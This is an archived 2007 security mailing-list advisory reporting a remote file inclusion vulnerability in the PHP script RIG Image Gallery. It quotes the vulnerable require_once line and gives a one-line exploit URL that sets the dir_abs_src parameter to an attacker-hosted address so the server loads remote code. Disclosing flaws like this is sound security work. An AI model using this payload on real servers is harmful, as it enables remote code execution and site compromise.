Pantek Library

Hosting Provided By

CybrHost

High Speed Hosting

RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

From: <ilkerkandemir(at)mynet.com>
Date: Mon Jul 30 2007 - 15:09:56 EDT

MEFISTO PreSents...

Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));

Exploit: check_entry.php?dir_abs_src=http://attacker.php?

Tnx:H0tturk,Ajann,Dumenci,Str0ke Received on Mon Jul 30 15:52:25 2007

This message: [ Message body ]
Next message: ilkerkandemir(at)mynet.com: "phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability"
Previous message: Moritz Muehlenhoff: "[SECURITY] [DSA 1342-1] New xfs packages fix privilege escalation"
Next in thread: security curmudgeon: "Re: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability"
Reply: security curmudgeon: "Re: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:10:29 EDT

Do you need help?

Contact Us Legal Notices Order Services Online
Pantek Home Privacy Policy IT news Site Map Pantek Library